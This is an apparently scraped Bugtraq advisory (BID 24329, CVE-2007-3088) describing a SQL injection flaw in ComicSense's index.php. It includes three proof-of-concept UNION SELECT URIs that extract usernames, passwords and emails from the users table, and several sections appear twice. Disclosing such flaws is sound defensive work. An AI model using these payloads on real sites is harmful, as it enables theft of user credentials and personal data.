ComicSense Index.PHP SQL Injection Vulnerability
BID:24329
Info
ComicSense Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24329 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3088 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 05 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | s0cratex is credited with the discovery of this vulnerability. |
| Vulnerable: |
ComicSense ComicSense 0 |
| Not Vulnerable: | |
Discussion
ComicSense Index.PHP SQL Injection Vulnerability
ComicSense is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
ComicSense is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Exploit / POC
ComicSense Index.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/comic_path/index.php?epi=-1 UNION SELECT username,1,1 FROM users
http://www.example.com/comic_path/index.php?epi=-1 UNION SELECT password,1,1 FROM users
http://www.example.com/comic_path/index.php?epi=-1 union select email,1,1 from users
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/comic_path/index.php?epi=-1 UNION SELECT username,1,1 FROM users
http://www.example.com/comic_path/index.php?epi=-1 UNION SELECT password,1,1 FROM users
http://www.example.com/comic_path/index.php?epi=-1 union select email,1,1 from users
Solution / Fix
ComicSense Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ComicSense Index.PHP SQL Injection Vulnerability
References:
References: